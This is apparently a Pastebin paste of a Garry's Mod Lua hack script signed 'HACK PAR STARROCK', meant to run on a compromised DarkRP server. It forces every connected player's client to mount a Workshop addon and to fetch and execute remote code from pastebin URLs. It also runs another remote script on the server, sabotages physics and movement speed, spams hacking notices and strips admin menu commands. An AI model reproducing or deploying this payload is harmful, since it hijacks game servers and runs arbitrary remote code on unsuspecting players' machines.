Advertisement
Guest User

Untitled

a guest
Jul 23rd, 2019
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
  1. if SERVER then
  2. for k, v in pairs(player.GetAll()) do
  3. v:SendLua("steamworks.FileInfo(1751603329,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  4. end
  5.  
  6.  
  7. print([[
  8. _____ _ _ _____ ______ _____ _____ ____________ _ _ ______ _____ ____
  9. | __ \| | | | __ \| ____/ ____|_ _|___ / ____| | | | | ____/ ____/ __ \ _
  10. | |__) | | | | |__) | |__ | | __ | | / /| |__ | |__| | | |__ | | | | | |_| |_
  11. | ___/| | | | _ /| __|| | |_ | | | / / | __| | __ | | __|| | | | | |_ _|
  12. | | | |__| | | \ \| |___| |__| |_| |_ / /__| |____| | | | | |___| |___| |__| | |_|
  13. |_| \____/|_| \_\______\_____|_____/_____|______|_| |_| |______\_____\____/
  14.  
  15.  
  16. ]])
  17.  
  18. timer.Create( "gvacspam", 0.1, 1, function()
  19. for k, ply in pairs( player.GetAll() ) do
  20. DarkRP.notify(ply, 2, 4, "HAKINGSYTEME EN CHARGEMENT .")
  21. end
  22. end)
  23.  
  24. timer.Simple( 10, function()
  25. for k, ply in pairs( player.GetAll() ) do
  26. DarkRP.notify(ply, 2, 4, "HAKINGSYTEME INSTALLATION.")
  27. end
  28. end )
  29.  
  30. timer.Simple( 14, function()
  31. for k,v in pairs(player.GetAll()) do
  32. v:SendLua([[http.Fetch('https://pastebin.com/raw/SnagTXBW',function(b,l,h,c)RunString(b)end,nil)]])
  33. v:SetRunSpeed(400* 4);
  34. v:SetWalkSpeed(200 * 2);
  35. end
  36.  
  37. RunConsoleCommand("sv_friction", "-8")
  38.  
  39. end )
  40. end )
  41.  
  42. timer.Simple( 76, function()
  43. http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil)
  44. end )
  45.  
  46. timer.Simple( 77, function()
  47. for k, ply in pairs( player.GetAll() ) do
  48. DarkRP.notify(ply, 2, 4, "HAKINGSYTEME Merci pour votre patience.")
  49. DarkRP.notify(ply, 2, 20, "HACK PAR STARROCK")
  50. end
  51. end )
  52.  
  53. timer.Simple( 210, function()
  54. RunConsoleCommand("sv_friction", "8")
  55. hook.Remove("Think", "2012akaapocalypse")
  56. end )
  57.  
  58.  
  59. hook.Remove( "PlayerSay", "Pure_Menu" )
  60. concommand.Remove("Pure_openMenu")
  61. concommand.Remove("ulx menu")
  62. ULib.addSayCommand( '!menu', lechat )
  63. ULib.cmds.addCommand( "ulx menu", lechat )
  64. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement